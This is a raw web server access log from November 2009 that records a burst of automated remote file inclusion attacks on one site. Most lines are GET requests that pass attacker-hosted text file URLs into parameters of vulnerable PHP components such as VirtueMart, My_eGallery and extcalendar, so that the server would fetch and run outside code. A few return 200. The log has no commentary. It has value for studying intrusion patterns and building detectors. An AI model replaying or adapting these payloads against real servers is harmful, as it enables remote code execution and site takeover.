190.97.219.4 - - [23/Nov/2009:03:58:36 -0800] "GET /logs/access_090615.log//error.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:58:39 -0800] "GET /logs/access_090824.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:03:58:49 -0800] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:58:58 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:03:58:58 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:03:58:58 -0800] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:03:59:12 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:03:59:12 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:03:59:12 -0800] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.133.46 - - [23/Nov/2009:03:59:20 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:59:20 -0800] "GET /logs/access_090803.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:59:20 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:59:21 -0800] "GET /logs/access_090525.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:59:24 -0800] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:03:59:24 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:03:59:25 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.133.46 - - [23/Nov/2009:03:59:27 -0800] "GET /logs/access_090511.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:59:40 -0800] "GET /logs/access_091019.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.85.173.55 - - [23/Nov/2009:03:59:44 -0800] "GET /components/com_freechat/chatwindow.php?uebergabe=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.85.173.55 - - [23/Nov/2009:03:59:44 -0800] "GET /logs/access_090810.log//components/com_freechat/chatwindow.php?uebergabe=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.85.173.55 - - [23/Nov/2009:03:59:44 -0800] "GET /logs//components/com_freechat/chatwindow.php?uebergabe=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:04:00:12 -0800] "GET /logs/access_090518.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:04:00:17 -0800] "GET /logs/access_090720.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.cbnumed.or.kr/bbs/enda-id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:04:00:33 -0800] "GET /logs/access_091019.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:04:03:54 -0800] "GET /logs/access_090309.log//error.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:04:09 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.107.162.36 - - [23/Nov/2009:04:04:10 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.107.162.36 - - [23/Nov/2009:04:04:11 -0800] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.97.219.4 - - [23/Nov/2009:04:04:14 -0800] "GET /logs/access_090914.log%20%20//////////?include/lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:04:04:14 -0800] "GET /////////?include/lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 200 1055 "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:04:04:14 -0800] "GET /logs//////////?include/lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 200 4955 "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:04:20 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.107.162.36 - - [23/Nov/2009:04:04:22 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.107.162.36 - - [23/Nov/2009:04:04:22 -0800] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:04:05:32 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:04:05:32 -0800] "GET /logs/access_090504.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:04:05:32 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:04:05:36 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:04:05:36 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:04:05:36 -0800] "GET /logs/access_090504.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:04:05:53 -0800] "GET /logs/access_090504.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:04:05:53 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:04:05:53 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:06:19 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.107.162.36 - - [23/Nov/2009:04:06:21 -0800] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.107.162.36 - - [23/Nov/2009:04:06:25 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.107.162.36 - - [23/Nov/2009:04:06:25 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.107.162.36 - - [23/Nov/2009:04:06:25 -0800] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.174.65.27 - - [23/Nov/2009:04:08:31 -0800] "GET /logs/access_090511.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.63.10.150 - - [23/Nov/2009:04:08:31 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
61.63.10.150 - - [23/Nov/2009:04:08:31 -0800] "GET /logs/access_091019.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.63.10.150 - - [23/Nov/2009:04:08:32 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [23/Nov/2009:04:08:33 -0800] "GET /com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [23/Nov/2009:04:08:36 -0800] "GET /logs/access_090803.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [23/Nov/2009:04:08:36 -0800] "GET /logs//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [23/Nov/2009:04:08:36 -0800] "GET /logs/access_090921.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.208 - - [23/Nov/2009:04:09:28 -0800] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
200.108.199.16 - - [23/Nov/2009:04:09:54 -0800] "GET /logs/access_090817.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [23/Nov/2009:04:09:54 -0800] "GET /logs/access_090330.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.63.10.150 - - [23/Nov/2009:04:12:36 -0800] "GET /logs/access_090622.log////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.63.10.150 - - [23/Nov/2009:04:12:37 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
61.63.10.150 - - [23/Nov/2009:04:12:37 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [23/Nov/2009:04:13:08 -0800] "GET /playing.php/common/db.php?commonpath=http://www.simplyski.com//idx? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:13:46 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:13:48 -0800] "GET /logs/access_090504.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:13:48 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:13:48 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:13:51 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:13:51 -0800] "GET /logs/access_090504.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:04:14:42 -0800] "GET /////////?include/lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 200 1055 "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:04:14:42 -0800] "GET /logs/access_090504.log//////////?include/lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:04:14:42 -0800] "GET /logs//////////?include/lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 200 4955 "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:15:06 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:15:06 -0800] "GET /logs/access_090504.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:15:06 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:15:40 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:15:40 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:15:40 -0800] "GET /logs/access_090504.log%20%20/modules/My_eGallery/index.php?basepath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.229.132.2 - - [23/Nov/2009:04:16:10 -0800] "GET /logs//skin/zero_vote//setup.php?dir=http://num.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.229.132.2 - - [23/Nov/2009:04:16:10 -0800] "GET /logs/access_090504.log%20%20//skin/zero_vote//setup.php?dir=http://num.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.229.132.2 - - [23/Nov/2009:04:16:10 -0800] "GET /skin/zero_vote//setup.php?dir=http://num.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.229.132.2 - - [23/Nov/2009:04:16:10 -0800] "GET /skin/zero_vote//setup.php?dir=http://num.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.229.132.2 - - [23/Nov/2009:04:16:10 -0800] "GET /logs//skin/zero_vote//setup.php?dir=http://num.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.229.132.2 - - [23/Nov/2009:04:16:10 -0800] "GET /logs/access_090504.log%20%20//skin/zero_vote//setup.php?dir=http://num.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.229.132.2 - - [23/Nov/2009:04:17:10 -0800] "GET /logs/access_090713.log%20%20//skin/zero_vote//setup.php?dir=http://num.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:04:17:58 -0800] "GET /logs/access_090504.log//////////?include/lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.229.132.2 - - [23/Nov/2009:04:18:24 -0800] "GET /logs/access_090713.log%20%20//skin/zero_vote//setup.php?dir=http://num.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:20:04 -0800] "GET //bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:20:04 -0800] "GET /logs/access_090928.log%20%20///bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:20:04 -0800] "GET /logs///bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:20:07 -0800] "GET //index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:20:07 -0800] "GET /logs///index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:20:08 -0800] "GET /logs/access_090921.log%20%20///index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:20:17 -0800] "GET /logs/access_091019.log%20%20///bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:20:21 -0800] "GET //index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:20:21 -0800] "GET /logs///index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:20:22 -0800] "GET /logs/access_090921.log%20%20///index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:20:34 -0800] "GET /logs/access_090622.log%20%20///bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:20:34 -0800] "GET /logs/access_090914.log%20%20///bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [23/Nov/2009:04:20:38 -0800] "GET /logs/access_090608.log/playing.php/common/db.php?commonpath=http://www.simplyski.com//idx? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:20:39 -0800] "GET /logs/access_091012.log%20%20///bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [23/Nov/2009:04:20:41 -0800] "GET /playing.php/common/db.php?commonpath=http://www.simplyski.com//idx? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
121.101.214.54 - - [23/Nov/2009:04:20:46 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.simplyski.com//idx? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:22:18 -0800] "GET /logs/access_091102.log%20%20///index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:22:25 -0800] "GET /logs/access_091102.log%20%20///index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:24:31 -0800] "GET //bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:24:31 -0800] "GET /logs///bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:24:37 -0800] "GET /logs/access_090928.log%20%20///bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:24:42 -0800] "GET /logs/access_091019.log%20%20///bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:24:57 -0800] "GET /logs/access_090622.log%20%20///bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:24:57 -0800] "GET /logs/access_090914.log%20%20///bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:25:02 -0800] "GET /logs/access_091012.log%20%20///bbs/include/print_category.php?setup[use_category]=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [23/Nov/2009:04:28:15 -0800] "GET /logs/access_090615.log/playing.php/common/db.php?commonpath=http://www.simplyski.com//idx? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:34:34 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:34:34 -0800] "GET /logs/access_090720.log//skin/zero_vote/ask_password.php?dir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:04:34:34 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [23/Nov/2009:04:41:34 -0800] "GET /logs/access_091102.log//common/db.php?commonpath=http://www.simplyski.com//idx? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
121.101.214.54 - - [23/Nov/2009:04:41:35 -0800] "GET /common/db.php?commonpath=http://www.simplyski.com//idx? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
121.101.214.54 - - [23/Nov/2009:04:41:39 -0800] "GET /logs//common/db.php?commonpath=http://www.simplyski.com//idx? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:49:29 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:49:29 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
